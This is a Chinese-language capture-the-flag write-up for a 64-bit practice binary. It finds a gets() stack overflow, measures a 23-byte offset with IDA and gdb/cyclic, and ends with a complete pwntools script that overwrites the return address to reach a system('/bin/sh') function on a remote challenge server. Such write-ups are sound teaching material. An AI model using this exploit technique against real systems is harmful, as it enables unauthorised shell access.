程序基本信息

我们可以看到这是一个64程序，没有保护开启。

程序溢出点

gets函数可以读取无限字符，存在栈溢出。

接下来我们测测需要多少字符长度可以溢出。

我们可以直接从ida上看到

变量s在栈上[bp-Fh]位置，也就是说我们只能输入(Fh + 8)(覆盖rbp需要8个字节)的字节就能覆盖到栈底rbp，紧跟栈底的便是返回地址，我们可以接上一个我们想要程序跳转到的地址。

当然ida显示大部分情况下栈偏移都是没问题的，但也有例外，所以最好手测一下溢出长度。

ida和gdb都可以测溢出长度，这里我介绍gdb的方法。

首先生成50个每4个字符都是独一无二的字符串

然后用gdb调试程序并把该字符串输入

我们看到程序运行到ret发生了错误

此时栈上的情况

我们可以看到，rsp处本来应该是返回地址，现在已经被我们输入的字符串覆盖了。

由于程序是小端法，所以agaa就在0x7fffffffe108处，我们只要知道agaa前有多少字符即可。

由于cyclic生成的字符串每四个字符都是唯一的，所以只要我们-l命令输入四个字符，它就能测算出这四个字符前有几个字符。(一个字符占一字节)

可以看到结果为23 = ida显示的Fh + 8

确定返回地址

现在我们已经可以成功劫持rip到我们想要的运行地址，哪要跳转到哪里才能pwn掉程序呢？

我们发现程序有一个函数fun()

执行了system("/bin/sh")，/bin/sh是一个软连接，它指向某一个shell，所以这个命令会开启一个shell，将rip劫持到这里，我们就能成功pwn掉程序。

编写exp脚本

直接附上exp

/usr/bin/python

#coding:utf-8

from pwn import *

context.update(arch = 'amd64', os = 'linux', timeout = 1)	#初始化上下文环境，主要是系统、架构和读取超时时间

io = remote('pwn.buuoj.cn', 6001)	#此处的IP地址和端口需要根据目标修改

system_addr = 0x401186  #函数fun()的地址

payload = ''

payload += 'A'*23			#使用23个任意字符填充

payload += p64(system_addr)	#返回地址覆盖为fun函数的地址，当主程序运行完返回时便会跳转到fun()函数并执行

io.sendline(payload)			#向程序输入payload，注意使用sendline()或者send()的数据末尾加上回车'\n'

io.interactive()

成功getshell

运行脚本成功获得flag